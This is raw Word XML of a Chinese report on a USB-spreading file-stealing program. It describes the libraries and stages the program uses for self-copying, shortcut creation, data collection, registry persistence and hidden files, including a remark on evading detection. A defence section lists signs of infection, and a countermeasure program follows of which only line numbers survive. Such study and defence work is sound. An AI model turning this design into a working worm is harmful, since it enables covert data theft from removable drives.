    <w:p w14:paraId="0D738595">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>• 关键用途：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39914D87">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t xml:space="preserve">  • copy2：保留元数据的文件复制</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="258E3273">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t xml:space="preserve">  • copytree：递归复制目录树</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="161A98A0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>tempfile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CFC6AC8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>• 功能：安全创建临时文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55C13AD4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>• 关键用途：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DB333FA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t xml:space="preserve">  • gettempdir()：获取系统临时目录路径</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29F2EF8D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t xml:space="preserve">  • 作为目标目录的保底选择</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08F2ACBE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>hashlib</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CA79E2F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>• 功能：加密哈希算法</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F4D177D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>• 关键用途：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27DA737D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t xml:space="preserve">  • md5()：文件内容去重校验</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="139257BE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t xml:space="preserve">  • sha256()：管理员令牌安全比对</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A7C48BC">
      <w:pPr>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>3. 硬件监控库</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42372CBB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>psutil</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E44EDC3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>• 功能：系统资源监控</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01EDD97A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>• 关键用途：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FDE1A16">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t xml:space="preserve">  • disk_partitions()：检测所有磁盘分区</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="053F9977">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t xml:space="preserve">  • 通过opts属性过滤可移动设备(removable)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="302B7B86">
      <w:pPr>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>4. 加密相关库</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F0399FC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>cryptography.fernet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="395F1149">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>• 功能：现代加密算法实现</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="449E8CE8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>• 关键用途：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19E0A163">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t xml:space="preserve">  • Fernet.generate_key()：生成AES-128密钥</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0485368C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t xml:space="preserve">  • encrypt()/decrypt()：保护管理员令牌</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16B565A2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t xml:space="preserve">  • 使用URL安全的Base64编码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="689A46AC">
      <w:pPr>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>5. 辅助功能库</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="057F4478">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D06E3C4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>• 功能：时间相关操作</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60976868">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>• 关键用途：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="399C4028">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t xml:space="preserve">  • sleep()：控制主循环扫描间隔</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B485ABD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t xml:space="preserve">  • strftime()：生成日志时间戳</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F4179BE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>uuid</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A9258A0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>• 功能：生成唯一标识符</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E92D458">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>• 关键用途：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="734654BB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t xml:space="preserve">  • `uuid4()`：创建不可预测的管理员令牌</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26C77D52">
      <w:pPr>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>6. Windows专属库</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="215628CF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>win32com.client(隐藏依赖)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="279A5C8E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>• 功能：COM组件调用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EB79993">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>• 关键用途：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37C5ADC4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t xml:space="preserve">  • `Dispatch('WScript.Shell')`：创建正规快捷方式</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C5DF906">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t xml:space="preserve">  • 避免使用容易被检测的批处理脚本</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="499807C8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>库之间的协作关系</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32D72A20">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>1. 检测阶段：psutil发现U盘 → os.path构建路径</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6697D7D0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>2. 传播阶段：shutil复制自身 → win32com创建快捷方式</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DB5D9D0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>3. 采集阶段：hashlib校验文件 → shutil复制数据</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A30AB3A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>4. 持久化：winreg写注册表 → ctypes设置隐藏属性</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42283C78">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>5. 加密：cryptography保护令牌 → uuid生成初始密钥</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1499A477">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>所有操作通过os和sys实现跨平台兼容性处理，关键系统交互依赖ctypes和winreg完成Windows特有功能。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default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F74CA11">
      <w:pPr>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>三、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>防御</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F43FADE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>​</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>应对方案一：普通用户手动排查</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E0ADEB6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>如何识别中毒迹象：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F155049">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>​异常行为检测：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E4E25C0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:ind w:left="425" w:leftChars="0" w:hanging="180" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>检查U盘根目录是否出现：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="668FF8F9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:ind w:left="425" w:leftChars="0" w:hanging="180" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>名为"资料库"的隐藏文件夹（需显示隐藏文件）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27E5C469">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:ind w:left="425" w:leftChars="0" w:hanging="180" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>异常的.exe文件（如资料库.exe）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54028CC4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:ind w:left="425" w:leftChars="0" w:hanging="180" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>可疑的.lnk快捷方式（右键属性查看真实目标路径）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C2E40B7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>​系统异常检查：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74CBC54F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:ind w:left="425" w:leftChars="0" w:hanging="202" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>在%APPDATA%或D:\目录下查找usb_killer文件夹</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="262D5031">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:ind w:left="425" w:leftChars="0" w:hanging="202" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>检查任务管理器是否有不明进程（如usb.exe）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50224451">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:ind w:left="425" w:leftChars="0" w:hanging="202" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>注册表路径HKCU\Software\Microsoft\Windows\CurrentVersion\Run下是否有"USBCopy"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BD37474">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>​日志痕迹检查：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ED6E5B2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:ind w:left="425" w:leftChars="0" w:hanging="202" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>搜索系统各分区根目录下的log.txt文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="313A565A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:ind w:left="425" w:leftChars="0" w:hanging="202" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>检查最近修改时间异常的文本/办公文档</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EA18D60">
      <w:pPr>
        <w:outlineLvl w:val="1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应对方案</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>二</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>：自动化反制程序</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F6A194B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程序如下：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="929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77"/>
        <w:gridCol w:w="8822"/>
      </w:tblGrid>
      <w:tr w14:paraId="040D65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96" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="477" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="single" w:color="6CE26C" w:sz="8" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F7F7F7"/>
            <w:tcMar>
              <w:right w:w="38" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p w14:paraId="03CA87A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001</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1E6B1FC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002</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4CE2153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003</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="00AE2D7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004</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2142B4C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005</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3505A69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006</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="18DCE84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007</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0849C87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008</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D135B6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009</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="65DE47D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010</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="112845A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011</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4DEC539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012</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="47A0502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013</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3A92676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014</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="58AFCB1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015</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="20B0893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016</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0173B0C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017</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="39C9091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018</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2C54771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019</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1CAE2AC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020</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5467979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021</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4E7CE42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022</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7E755BB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023</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="73861DB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024</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="761FD74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025</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="703F509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026</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7CEDBE9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027</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="569A834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028</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="01E7BD5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029</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="286E909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030</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2B10345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031</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1136F5C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032</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3CBA513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033</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="06FBD49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034</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1B168A6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035</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0096908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036</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7B87C21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037</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5CD674C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038</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5E8612D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039</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5A86B62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040</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7107ECF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041</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="31A5981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042</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6BDDEBB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043</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D82398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044</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7F8CFD3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045</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6F98480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046</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="19D858F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047</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2704B66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048</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="79F173F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049</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0CBD0B6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050</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="218E926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051</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="32F7F4B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052</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7841C9C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053</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5DEB55D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054</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5447239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055</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="659F175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056</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="53A66B5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057</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7FFC86B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058</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5E21B64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059</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6B615F9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060</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="258EAD9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061</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="77F0E34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062</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F55832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063</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="279BBA0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064</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="71EC690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065</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6E20E85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066</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5ED5D95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067</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3C3E911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068</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3F16B6C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069</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2B04E30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070</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="08D43CB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071</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="28B7822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072</w:t>
            </w:r>
          </w:p>
